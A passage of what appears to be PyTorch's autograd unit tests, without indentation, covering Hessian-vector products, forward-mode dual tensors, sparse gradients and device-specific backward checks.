self.assertEqual(res[1].abs().sum(), 0.)
def test_vhp_no_grad(self):
def reducer(x):
return x.exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
with torch.no_grad():
res = autogradF.vhp(reducer, inputs, v)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
with torch.no_grad():
res = autogradF.vhp(reducer, inputs, v, create_graph=True)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
def test_vhp_output(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.vhp(foo, inputs, v)
self._assert_same_struct(res[1], inputs)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
def bar(a, b):
return (a + 3 * b.narrow(0, 0, 3)).exp().sum()
inputs = (torch.rand(3), torch.rand(4))
v = (torch.ones(3), torch.ones(4))
out, vhp_val = autogradF.vhp(bar, inputs, v)
self._assert_same_struct(vhp_val, inputs)
self.assertIsNone(out.grad_fn)
self.assertIsNone(vhp_val[0].grad_fn)
self.assertIsNone(vhp_val[1].grad_fn)
def test_vhp_scalar(self):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.vhp(reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
inputs = torch.rand([])
v = torch.rand([])
res = autogradF.vhp(reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
res = autogradF.vhp(reducer, inputs)
self._assert_same_struct(res[1], inputs)
def bad_reducer(x):
return x.sum().view(1, 1, 1)
inputs = torch.rand(4, 4)
v = torch.rand(4, 4)
res = autogradF.vhp(bad_reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
def test_vhp_create_graph(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
inputs = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
v = torch.ones(4, 4, dtype=torch.double, requires_grad=True)
res = autogradF.vhp(foo, inputs, v, create_graph=True)
self._assert_same_struct(res[1], inputs)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
gradcheck(lambda inp, v: autogradF.vhp(foo, inp, v, create_graph=True), (inputs, v))
gradgradcheck(lambda inp, v: autogradF.vhp(foo, inp, v, create_graph=True), (inputs, v))
def bar(a, b):
return (a + 3 * b.narrow(0, 0, 3)).exp().sum()
inputs = (torch.rand(3, dtype=torch.double, requires_grad=True),
torch.rand(4, dtype=torch.double, requires_grad=True))
v = (torch.ones(3, dtype=torch.double, requires_grad=True),
torch.ones(4, dtype=torch.double, requires_grad=True))
out, vhp_val = autogradF.vhp(bar, inputs, v, create_graph=True)
self._assert_same_struct(vhp_val, inputs)
self.assertIsNotNone(out.grad_fn)
self.assertIsNotNone(vhp_val[0].grad_fn)
self.assertIsNotNone(vhp_val[1].grad_fn)
gradcheck(lambda *args: autogradF.vhp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)
gradgradcheck(lambda *args: autogradF.vhp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)
def foo(*args):
x, y = args[:2]
v = args[2:]
x = x.cos()
val, grad = autogradF.vhp(bar, (x, y), v, create_graph=True)
return val.cos() + grad[0].cos().sum() + grad[1].cos() + x.cos().sum() + y.cos()
gradcheck(foo, inputs + v)
gradgradcheck(foo, inputs + v)
def test_hvp_err_check(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
def bar2(a):
return 3 * a.narrow(0, 0, 3)
inp = torch.rand(4)
v = torch.rand(4)
res = autogradF.hvp(foo, inp, v)
with self.assertRaisesRegex(TypeError, "The inputs given to hvp must be either a Tensor"):
res = autogradF.hvp(foo, (inp, 2), v)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to hvp must"):
res = autogradF.hvp(bar, inp, v)
err_msg_out = "The Tensor returned by the function given to hvp should contain a single element"
with self.assertRaisesRegex(RuntimeError, err_msg_out):
res = autogradF.hvp(bar2, inp, v)
with self.assertRaisesRegex(RuntimeError, "v has invalid size:"):
res = autogradF.hvp(foo, inp, torch.rand(5))
with self.assertRaisesRegex(TypeError, "The v given to hvp must be either a Tensor or a tuple of Tensors"):
res = autogradF.hvp(foo, inp, (v, 2))
res = autogradF.hvp(foo, inp, v)
self._assert_same_struct(res[1], inp)
def foo(a, b):
return (3 * b.narrow(0, 0, 3) * a.narrow(0, 0, 3)).sum()
inp = (torch.rand(4), torch.rand(5))
v = (torch.rand(4), torch.rand(5))
res = autogradF.hvp(foo, inp, v)
self._assert_same_struct(res[1], inp)
def test_hvp_err_check_strict(self):
def foo(a):
return a.detach().sum()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone().sum()
def bar2(a):
# A Linear function for which the jacobian is independent of the input
return (3 * a).sum()
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.hvp(foo, inp, v, strict=True)
res = autogradF.hvp(foo, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"):
res = autogradF.hvp(bar, inp, v, strict=True)
res = autogradF.hvp(bar, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0 is"):
res = autogradF.hvp(bar2, inp, v, strict=True)
res = autogradF.hvp(bar2, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
def test_hvp_no_grad(self):
def reducer(x):
return x.exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
with torch.no_grad():
res = autogradF.hvp(reducer, inputs, v)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
with torch.no_grad():
res = autogradF.hvp(reducer, inputs, v, create_graph=True)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
def test_hvp_output(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.hvp(foo, inputs, v)
self._assert_same_struct(res[1], inputs)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
def bar(a, b):
return (a + 3 * b.narrow(0, 0, 3)).exp().sum()
inputs = (torch.rand(3), torch.rand(4))
v = (torch.ones(3), torch.ones(4))
out, hvp_val = autogradF.hvp(bar, inputs, v)
self._assert_same_struct(hvp_val, inputs)
self.assertIsNone(out.grad_fn)
self.assertIsNone(hvp_val[0].grad_fn)
self.assertIsNone(hvp_val[1].grad_fn)
def test_hvp_scalar(self):
def reducer(x):
return x.exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.hvp(reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
inputs = torch.rand([])
v = torch.rand([])
res = autogradF.hvp(reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
res = autogradF.hvp(reducer, inputs)
self._assert_same_struct(res[1], inputs)
def bad_reducer(x):
return x.exp().sum().view(1, 1, 1)
inputs = torch.rand(4, 4)
v = torch.rand(4, 4)
res = autogradF.hvp(bad_reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
def test_hvp_create_graph(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
inputs = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
v = torch.ones(4, 4, dtype=torch.double, requires_grad=True)
res = autogradF.hvp(foo, inputs, v, create_graph=True)
self._assert_same_struct(res[1], inputs)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
gradcheck(lambda inp, v: autogradF.hvp(foo, inp, v, create_graph=True), (inputs, v))
gradgradcheck(lambda inp, v: autogradF.hvp(foo, inp, v, create_graph=True), (inputs, v))
def bar(a, b):
return (a + 3 * b.narrow(0, 0, 3)).exp().sum()
inputs = (torch.rand(3, dtype=torch.double, requires_grad=True),
torch.rand(4, dtype=torch.double, requires_grad=True))
v = (torch.ones(3, dtype=torch.double, requires_grad=True),
torch.ones(4, dtype=torch.double, requires_grad=True))
out, hvp_val = autogradF.hvp(bar, inputs, v, create_graph=True)
self._assert_same_struct(hvp_val, inputs)
self.assertIsNotNone(out.grad_fn)
self.assertIsNotNone(hvp_val[0].grad_fn)
self.assertIsNotNone(hvp_val[1].grad_fn)
gradcheck(lambda *args: autogradF.hvp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)
gradgradcheck(lambda *args: autogradF.hvp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)
def foo(*args):
x, y = args[:2]
v = args[2:]
x = x.cos()
val, grad = autogradF.hvp(bar, (x, y), v, create_graph=True)
return val.cos() + grad[0].cos().sum() + grad[1].cos() + x.cos().sum() + y.cos()
gradcheck(foo, inputs + v)
gradgradcheck(foo, inputs + v)
def test_jacobian_match_vjp_jvp(self):
def foo(x):
return x ** 3 + x.sum()
inputs = torch.rand(4)
v = torch.rand(4)
jac = autogradF.jacobian(foo, inputs)
jvp = autogradF.jvp(foo, inputs, v)[1]
vjp = autogradF.vjp(foo, inputs, v)[1]
self.assertEqual(jvp, torch.mm(jac, v.unsqueeze(1)).squeeze(1))
self.assertEqual(vjp, torch.mm(v.unsqueeze(0), jac).squeeze(0))
def test_hessian_match_vhp_hvp(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
inputs = torch.rand(4)
v = torch.rand(4)
hes = autogradF.hessian(foo, inputs)
hvp = autogradF.hvp(foo, inputs, v)[1]
vhp = autogradF.vhp(foo, inputs, v)[1]
self.assertEqual(hvp, torch.mm(hes, v.unsqueeze(1)).squeeze(1))
self.assertEqual(vhp, torch.mm(v.unsqueeze(0), hes).squeeze(0))
class TestAutogradForwardMode(TestCase):
def tearDown(self):
# Ensure that a failing test won't make others fail
while fwAD._current_level >= 0:
fwAD.exit_dual_level()
super().tearDown()
def test_forward_level_cleanup(self):
def get_tensor_and_weak_ref():
# Create a new Tensor and weak reference
t = torch.rand(2, requires_grad=True)
return t, torch._C._WeakTensorRef(t)
# Sanity check that the helper function works as expected
t, t_ref = get_tensor_and_weak_ref()
self.assertFalse(t_ref.expired())
del t
self.assertTrue(t_ref.expired())
# Main test code
foo = torch.rand(2)
with fwAD.dual_level():
tangent, tangent_ref = get_tensor_and_weak_ref()
self.assertFalse(tangent_ref.expired())
dual = fwAD.make_dual(foo, tangent)
self.assertFalse(tangent_ref.expired())
# Make sure that the tangent we provided has been re-used as is
self.assertTrue(fwAD.unpack_dual(dual)[1] is tangent)
# Make sure that dual is keeping the tangent alive
del tangent
self.assertFalse(tangent_ref.expired())
# Make sure that the dual level does not keep the c++
# version of the tangent alive
del dual
self.assertTrue(tangent_ref.expired())
def test_size_check(self):
foo = torch.rand(2)
tangent = torch.rand(3)
with fwAD.dual_level():
with self.assertRaisesRegex(RuntimeError, "Trying to set a forward gradient that has a different size"):
dual = fwAD.make_dual(foo, tangent)
dual = fwAD.make_dual(foo, tangent[1:])
# The following test functions want to ensure all the following behaviors:
# - Ensure that default level system in the python binding works
# - Ensure that only level 0 exists and nesting is properly disabled
# - Ensure that printing works fine
# - Ensure that basic packing/unpacking works
# - Ensure that advanced packing/unpacking works
# - For memory / version counter share
# - For backward AD (regular ops)
# - Ensure that view + inplace for both modes work fine
# - Ensure we do proper cleanup on exit of a level
def test_default_level(self):
foo = torch.rand(2)
bar = torch.rand(2)
with fwAD.dual_level():
baz = fwAD.make_dual(foo, bar)
baz_primal, baz_tangent = fwAD.unpack_dual(baz)
self.assertEqual(baz_primal, foo)
# We don't actually need to enforce that these two are the exact same python
# object, feel free to relax in the future
self.assertIs(baz_tangent, bar)
baz_primal, baz_tangent = fwAD.unpack_dual(baz)
self.assertEqual(baz_primal, foo)
self.assertEqual(baz_tangent, None)
def test_nested_level(self):
with fwAD.dual_level() as level:
# For now only level 0 exists
self.assertEqual(level, 0)
with fwAD.dual_level():
with self.assertRaisesRegex(RuntimeError, "Nested forward mode AD is not supported at the moment"):
nest_level = fwAD.enter_dual_level()
def test_print(self):
with fwAD.dual_level() as level:
a = torch.rand(3)
self.assertFalse("tangent=" in str(a))
b = fwAD.make_dual(a, torch.rand(3))
self.assertFalse("tangent=" in str(a))
self.assertTrue("tangent=" in str(b))
b_primal, b_tangent = fwAD.unpack_dual(b)
self.assertFalse("tangent=" in str(b_primal))
self.assertFalse("tangent=" in str(b_tangent))
def test_basic_packing_unpacking(self):
foo = torch.rand(2)
bar = torch.rand(2)
with fwAD.dual_level():
baz = fwAD.make_dual(foo, bar)
baz_primal, baz_tangent = fwAD.unpack_dual(baz)
self.assertEqual(baz_primal, foo)
self.assertIs(baz_tangent, bar)
# Check that packing/unpacking did not change the input
foo_primal, foo_tangent = fwAD.unpack_dual(foo)
self.assertEqual(foo_primal, foo)
self.assertIsNone(foo_tangent)
def test_advanced_packing_unpacking(self):
foo = torch.rand(2)
bar = torch.ones(2)
# Memory and version counter check
with fwAD.dual_level():
dual = fwAD.make_dual(foo, bar)
# Ensure that they are sharing memory and version counter
self.assertEqual(dual.storage().data_ptr(), foo.storage().data_ptr())
# Ensure we properly share the version counter
self.assertEqual(foo._version, dual._version)
foo.add_(1)
self.assertEqual(foo._version, dual._version)
# Unpacking should only create aliases as well
dual_primal, dual_tangent = fwAD.unpack_dual(dual)
self.assertEqual(dual_primal.storage().data_ptr(), foo.storage().data_ptr())
self.assertEqual(dual_tangent.storage().data_ptr(), bar.storage().data_ptr())
# And the tangent is actually re-used as-is so it is still the same Tensor
self.assertIs(dual_tangent, bar)
# Ensure we properly share the version counter
self.assertEqual(foo._version, dual_primal._version)
foo.add_(1)
self.assertEqual(foo._version, dual_primal._version)
self.assertEqual(bar._version, dual_tangent._version)
bar.add_(1)
self.assertEqual(bar._version, dual_tangent._version)
# backward mode check
with fwAD.dual_level():
foo.requires_grad_()
bar.requires_grad_()
# Check that backward gradients properly propagates through packing/unpacking
dual = fwAD.make_dual(foo, bar)
p, t = fwAD.unpack_dual(dual)
gfoo, gbar = torch.autograd.grad(p.sum(), (foo, bar), retain_graph=True, allow_unused=True)
self.assertEqual(gfoo, torch.ones_like(foo))
self.assertIsNone(gbar)
gfoo, gbar = torch.autograd.grad(t.sum(), (foo, bar), retain_graph=True, allow_unused=True)
self.assertIsNone(gfoo)
self.assertEqual(gbar, torch.ones_like(bar))
# Check that forward gradients are impacted by detach()
detached_dual = dual.detach()
out = detached_dual * 2
p, t = fwAD.unpack_dual(out)
self.assertFalse(p.requires_grad)
self.assertEqual(p, foo * 2)
self.assertIsNone(t)
# Check that forward gradients are not impacted by no_grad
with torch.no_grad():
out = dual * 3
p, t = fwAD.unpack_dual(out)
self.assertFalse(p.requires_grad)
self.assertFalse(t.requires_grad)
self.assertEqual(p, foo * 3)
self.assertEqual(t, bar * 3)
# Check that forward gradients are not impacted by inplace detach
dual = dual.clone()
dual.detach_()
out = dual * 2
p, t = fwAD.unpack_dual(out)
self.assertFalse(p.requires_grad)
self.assertEqual(p, foo * 2)
self.assertIsNone(t)
def test_view_inplace_non_differentiable_views(self):
original_foo = torch.rand(2, dtype=torch.double)
original_bar = torch.ones(2, dtype=torch.double)
# Do clones to be able to compare the values updated inplace
# with the original content of these Tensors
foo = original_foo.clone()
bar = original_bar.clone()
with fwAD.dual_level():
# Note that in this test, we use "update" to mean computing the right tangent for the dual
# All the inplace operations here are expected to update the primal value of the Tensors but
# not always their tangents.
# Also all mentions of "non differentiable view" here means non forward differentiable view
# unless specified otherwise.
# See note [Forward Grad View/inplace] for more details on how these views work.
# Check that inplace ops do not update non-differentiable views
# Non differentiable view
dual = fwAD.make_dual(foo, bar)
dual *= 2
# Check that non differentiable view's tangent was not updated
self.assertIsNone(fwAD.unpack_dual(foo)[1])
# Check that the computed result is correct
self.assertEqual(bar, original_bar * 2)
self.assertEqual(fwAD.unpack_dual(dual)[1], original_bar * 2)
self.assertEqual(foo, original_foo * 2)
self.assertEqual(fwAD.unpack_dual(dual)[0], original_foo * 2)
# Other non differentiable view
dual_primal, dual_tangent = fwAD.unpack_dual(dual)
self.assertIsNone(fwAD.unpack_dual(dual_primal)[1])
self.assertIsNone(fwAD.unpack_dual(dual_tangent)[1])
dual_primal *= 2
# Ensure dual's tangent did not change
self.assertEqual(fwAD.unpack_dual(dual)[0], original_foo * 4)
self.assertEqual(fwAD.unpack_dual(dual)[1], original_bar * 2)
dual_tangent *= 2
# Ensure dual's primal did not change
self.assertEqual(fwAD.unpack_dual(dual)[0], original_foo * 4)
self.assertEqual(fwAD.unpack_dual(dual)[1], original_bar * 4)
def test_view_inplace_differentiable_views(self):
original_foo = torch.rand(2)
original_bar = torch.ones(2)
# Do clones to be able to compare the values updated inplace
# with the original content of these Tensors
foo = original_foo.clone()
bar = original_bar.clone()
with fwAD.dual_level():
# Check that inplace ops do update differentiable view but stop at non differentiable ones
# A non differentiable view
dual = fwAD.make_dual(foo, bar)
# A differentiable view
view = dual.narrow(0, 0, 1)
view *= 2
# Check that non differentiable view was not updated
self.assertIsNone(fwAD.unpack_dual(foo)[1])
# Check that differentiable view was updated
self.assertEqual(fwAD.unpack_dual(dual)[1], torch.tensor([2., 1.]))
self.assertEqual(fwAD.unpack_dual(view)[1], torch.tensor([2.]))
# Check that we track differentiable view even for Tensors that are not dual
baz = torch.rand(2)
baz += dual
self.assertEqual(fwAD.unpack_dual(baz)[1], fwAD.unpack_dual(dual)[1])
# Updates on view should as well
baz = torch.rand(2)
baz[0] = dual[0]
self.assertEqual(fwAD.unpack_dual(baz)[1][0], fwAD.unpack_dual(dual)[1][0])
# Unused values get a gradient of 0
self.assertEqual(fwAD.unpack_dual(baz)[1][1], 0.)
# Check that forward non-differentiable views do prevent gradient update
baz = torch.rand(2)
view = baz.detach()
view += dual
self.assertIsNone(fwAD.unpack_dual(baz)[1])
def test_grad_cleanup(self):
foo = torch.rand(2)
bar = torch.rand(2)
baz = torch.rand(2)
with fwAD.dual_level():
dual = fwAD.make_dual(foo, bar)
self.assertIsNone(fwAD.unpack_dual(foo)[1])
self.assertIs(fwAD.unpack_dual(dual)[1], bar)
self.assertIsNone(fwAD.unpack_dual(dual)[1])
with fwAD.dual_level():
self.assertIsNone(fwAD.unpack_dual(foo)[1])
new_dual = fwAD.make_dual(foo, baz)
dual_primal, dual_tangent = fwAD.unpack_dual(dual)
new_dual_primal, new_dual_tangent = fwAD.unpack_dual(new_dual)
self.assertEqual(dual_primal, new_dual_primal)
self.assertIsNone(dual_tangent)
self.assertEqual(new_dual_tangent, baz)
def test_detach_view_tracking(self):
# Default detach is both forward and backward non-differentiable
foo = torch.rand(2)
foo_weak = torch._C._WeakTensorRef(foo)
out = foo.detach()
del foo
self.assertTrue(foo_weak.expired())
# Generic device type autograd tests.
class TestAutogradDeviceType(TestCase):
def test_min_max_median_backprops_to_all_values(self, device):
for f in [torch.min, torch.max, torch.median, torch.nanmedian]:
x1 = torch.tensor([1., 0., 1., 0., 1., 0.], device=device, requires_grad=True)
x2 = torch.tensor([float('nan'), float('nan'), float('nan')], requires_grad=True)
for x in [x1, x2]:
y = f(x)
y.backward()
self.assertEqual(x.grad.sum(), 1.)
self.assertEqual((x.grad == 1 / 3).sum(), 3)
def test_cdist(self, device):
def _test_euclidean_large_cdist(sizex, sizey=None):
if sizey is None:
sizey = sizex
x = torch.randn(sizex, device=device, dtype=torch.float)
y = torch.randn(sizey, device=device, dtype=torch.float)
eps = 1e-6
# to avoid extremum
x = x - (((x - y) < eps).float() * 2 * eps)
x.requires_grad = True
y.requires_grad = True
dist = torch.cdist(x, y, p=2)
# Do a backward pass to check that it is valid for large
# matrices
loss = dist.sum()
loss.backward()
_test_euclidean_large_cdist((2000, 5))
# Ensure that cdist backward with p<1 does not produce NaNs
def test_cdist_grad_p_lt_1_no_nan(self, device):
for p in [0.99, 0.7, 0.5, 0.1, 0.01]:
x = torch.randn(1, 2, device=device)
y = x.clone().detach() + torch.tensor([[1., 0.]], device=device)
x.requires_grad = True
y.requires_grad = True
result = torch.cdist(x, y, p=p)
result.backward(torch.ones_like(result))
self.assertFalse(torch.isnan(x.grad).any())
self.assertFalse(torch.isnan(y.grad).any())
def test_cdist_same_inputs(self, device):
# Test to detect issues in cdist gradient calculation
# When the distances are 0
sizex = (1, 27, 32)
for p in [0, 1, 2, 3, 1.5, 2.5, float('inf')]:
x = torch.randn(sizex, device=device, dtype=torch.float)
dist_grad = torch.randn((1, 27, 27), device=device, dtype=torch.float)
y = x.clone()
eps = 1e-6
x.requires_grad = True
d = torch.cdist(x, y)
d.backward(dist_grad)
# Check that the backward passs does not contain invalid
# values such as nan or inf
assert torch.isfinite(x.grad).all()
def test_parameter_resize(self, device):
asd = torch.nn.Parameter(torch.ones(16, dtype=torch.double, device=device))
for i in range(2):
with torch.no_grad():
asd.set_(asd[1:])
asd.grad = None
m = torch.cat((asd, asd))
m.sum().backward()
@dtypes(torch.double, torch.cdouble)
def test_sparse_ctor_getter_backward(self, device, dtype):
# See NOTE [ Sparse: autograd and API ] on the expected behavior of this test
def _test(size, sparse_dim, nnz, device):
v_size = [nnz] + list(size[sparse_dim:])
i = torch.rand(sparse_dim, nnz)
i.mul_(torch.tensor(size[:sparse_dim]).unsqueeze(1).to(i))
i = i.to(torch.long)
inp = torch.randn(v_size, dtype=torch.double, device=device, requires_grad=True)
other = self.genSparseTensor(size, sparse_dim, nnz, is_uncoalesced=True, device=device,
dtype=dtype)[0]
def fn(v):
x = torch.sparse_coo_tensor(i, v, size, dtype=dtype, device=device)
y = (x + other).coalesce()
yv = y.values()
new_v = yv.tanh()
z = torch.sparse_coo_tensor(y.indices(), new_v, y.size())
return z.coalesce().values()
gradcheck(fn, (inp,), check_batched_grad=False)
# FIXME: make gradgradcheck work.
# gradgradcheck(fn, (inp,), check_batched_grad=False)
# assert that _values is non-differentiable
with self.assertRaisesRegex(RuntimeError, "does not have a grad_fn"):
other.detach().requires_grad_()._values().backward(torch.ones_like(other._values()))
for empty_i, empty_v, empty_nnz in product([True, False], repeat=3):
sparse_size = [] if empty_i else [2, 1]
dense_size = [1, 0, 2] if empty_v else [1, 2]
nnz = 0 if empty_nnz else 5
_test(sparse_size + dense_size, len(sparse_size), nnz, device)
@dtypes(torch.double, torch.cdouble)
def test_sparse_backward(self, device, dtype):
class FixedGradientFunction(Function):
@staticmethod
def forward(ctx, x, grad_x):
ctx.save_for_backward(grad_x)
return x
@staticmethod
def backward(ctx, grad_x):
saved_grad_x, = ctx.saved_tensors
return saved_grad_x, None
size = torch.Size([6, 3, 2])
i1 = torch.tensor([
[0, 3, 4],
[0, 2, 2],
], dtype=torch.long)
v1 = make_tensor([3, 2], dtype=dtype, device=device)
sparse_grad1 = torch.sparse_coo_tensor(i1, v1, size, dtype=dtype, device=device)
i2 = torch.tensor([
[0, 1, 3, 4],
[0, 1, 2, 2],
], dtype=torch.long)
v2 = make_tensor([4, 2], dtype=dtype, device=device)
sparse_grad2 = torch.sparse_coo_tensor(i2, v2, size, dtype=dtype, device=device)
dense_grad = torch.rand(size, device=device, dtype=dtype)
fn = FixedGradientFunction
# sparse first
x = torch.randn(size, dtype=dtype, device=device, requires_grad=True)
(fn.apply(x, sparse_grad1) + fn.apply(x, dense_grad) + fn.apply(x, sparse_grad2)).sum().backward()
self.assertEqual(x.grad, dense_grad + sparse_grad1 + sparse_grad2)
# dense first
x = torch.randn(size, dtype=dtype, device=device, requires_grad=True)
(fn.apply(x, dense_grad) + fn.apply(x, sparse_grad1) + fn.apply(x, sparse_grad2)).sum().backward()
self.assertEqual(x.grad, dense_grad + sparse_grad1 + sparse_grad2)
# sparse only
x = torch.randn(size, dtype=dtype, device=device, requires_grad=True)
(fn.apply(x, sparse_grad1) + fn.apply(x, sparse_grad2)).sum().backward()
self.assertEqual(x.grad, sparse_grad1 + sparse_grad2)
# autograd tests via common_method_invocations don't allow input tensors to
# be sparse (RuntimeError: gradcheck expects all tensor inputs are dense when
# check_sparse_nnz is set to False.)
def test_sparse_mask_autograd(self, device):
tensor = torch.randn(3, requires_grad=True, device=device)
mask = torch.ones(3, device=device)
mask[1] = 0
mask = mask.to_sparse()
converted = tensor.sparse_mask(mask).to_dense()
converted.sum().backward()
self.assertEqual(tensor.grad, mask.to_dense())
def test_pyscalar_conversions(self, device):
def _test_pyscalar_conversions(t, integral_conv):
# integral -> integral
l = t(torch.zeros(1, 1, 1, dtype=torch.long))
pyscalar = -12345
l[0] = pyscalar
self.assertEqual(integral_conv(l), pyscalar)
# floating point -> floating point
f = Variable(t(torch.randn(1, 1, dtype=torch.double)))
pyscalar = -12345.1
f[0] = pyscalar
self.assertEqual(float(f), pyscalar)
f[0] = nan
self.assertTrue(math.isnan(float(f)))
f[0] = inf
self.assertEqual(float(f), inf)
f[0] = -inf
self.assertEqual(float(f), -inf)
# integral -> floating point
# check we can convert something that loses precision
pyscalar = 1234567890123456789
self.assertNotEqual(pyscalar, integral_conv(float(pyscalar)))
l[0] = pyscalar
self.assertEqual(float(l), float(pyscalar))
# floating point -> integral
f[0] = nan
self.assertRaises(ValueError, lambda: integral_conv(f[0]))
f[0] = inf
self.assertRaises(OverflowError, lambda: integral_conv(f[0]))
f[0] = -inf
self.assertRaises(OverflowError, lambda: integral_conv(f[0]))
f[0] = sys.float_info.max
self.assertEqual(integral_conv(f), sys.float_info.max)
# bool, nonzero
def test_nonzero(tensor, value, expected):
tensor[0] = value
self.assertEqual(expected, bool(tensor))
self.assertEqual(expected, True if tensor else False)
test_nonzero(l, 0, False)
test_nonzero(l, -2, True)
test_nonzero(f, 0.0, False)
test_nonzero(f, sys.float_info.min, True)
test_nonzero(f, nan, bool(nan))
test_nonzero(f, inf, bool(inf))
test_nonzero(f, -inf, bool(-inf))
_test_pyscalar_conversions(lambda x: x.to(device), lambda x: int(x))
@dtypesIfCUDA(torch.half, torch.float, torch.double, torch.int8, torch.int16, torch.int32, torch.int64)
@dtypes(torch.float, torch.double, torch.int8, torch.int16, torch.int32, torch.int64)
def test_set_requires_grad_only_for_floats(self, device, dtype):
def f1():
a = torch.ones(1, dtype=dtype, device=device)
a.requires_grad_()
def f2():
a = torch.ones(1, dtype=dtype, device=device)
a.requires_grad = True
def f3():
torch.ones(1, dtype=dtype, device=device, requires_grad=True)
a = torch.ones(1, dtype=dtype, device=device)
a.requires_grad = False # should always work
a.requires_grad_(False)
for f in [f1, f2, f3]:
if dtype.is_floating_point:
f()
else:
with self.assertRaisesRegex(RuntimeError, 'floating point', msg="dt: {} device: {}".format(a.dtype, a.device)):
f()
@onlyCUDA
def test_advanced_indexing_backwards_large(self, device):
# See https://github.com/pytorch/pytorch/issues/22843
n = (1 << 16)
x = torch.rand(n, 1, device=device, requires_grad=True)
a = x[:, [0]]
a.sum().backward()
self.assertEqual(x.grad, torch.ones(n, 1, device=device))
def test_advanced_indexing_backwards_memory_format(self, device):
# See https://github.com/pytorch/pytorch/issues/36956
shape = (2, 8, 1, 2)
i = torch.randint(1, shape, device=device).contiguous(memory_format=torch.channels_last)
x = torch.randn(shape, requires_grad=True, device=device)
x[i].sum().backward()
def _test_reentrant_parent_error_on_cpu(self, device):
t1 = torch.rand([3, 3], requires_grad=True)
t2 = torch.rand([3, 3], device=device, requires_grad=True)
t3 = torch.rand([3, 3], device=device, requires_grad=True)
# Parent graph cpu graph.
t4 = t1 * t1
t5 = TestAutograd.SimulateBackwardError.apply(t4)
# Child gpu graph (much longer than parent graph).
prev = t2 * t2
for i in range(10):
prev = prev * t2
reentrant_root = prev
class ReentrantFunc(Function):
@staticmethod
def forward(ctx, inp):
return inp.clone()
@staticmethod
def backward(ctx, grad):
# Reentrant backward in child will take much longer.
reentrant_root.backward()
return grad
# Parent gpu graph.
t6 = ReentrantFunc.apply(t3)
t7 = t6 * t6
# Parent graph will error out first, while child graph will continue executing.
with self.assertRaisesRegex(Exception, "Simulate error"):
torch.autograd.backward([t5.sum(), t7.sum()])
# No grads should be accumulated since child graph will stop execution
# after parent receives error.
self.assertIsNone(t2.grad)
self.assertIsNone(t1.grad)
self.assertIsNone(t3.grad)
@onlyCUDA
def test_reentrant_parent_error_on_cpu(self, device):
before = CudaMemoryLeakCheck.get_cuda_memory_usage()
# Run as separate function so that gc can clean up everything when we
# check for memory usage.
self._test_reentrant_parent_error_on_cpu(device)
# Wait for autograd thread to cleanup failed tasks.
after = CudaMemoryLeakCheck.get_cuda_memory_usage()
start = time.time()
while before != after and time.time() - start < 30:
time.sleep(0.1)
after = CudaMemoryLeakCheck.get_cuda_memory_usage()
self.assertEqual(before, after)
# test for backward in https://github.com/pytorch/pytorch/issues/15511
# TODO: opinfo pdist
def test_pdist_large(self, device):
def func(x):
return torch.pdist(x, p=2)
# shape[0] should be able to be (roughly) arbitrarily large, but the kernel
# is currently limited to smaller sizes (see issue above); this is just testing
# a floor.
shape = (1000, 1)
x = torch.randn(shape, device=device).requires_grad_()
output = torch.pdist(x, p=2)
# just run a single backward, as gradcheck/gradgradcheck is expensive here
output.sum().backward()
# TODO: see if these tests can be ported to OpInfos or moved to where's test suite
def test_where_functional(self, device):
x = torch.randn(5, 5, dtype=torch.double, device=device, requires_grad=True)
y = torch.randn(5, 5, dtype=torch.double, device=device, requires_grad=True)
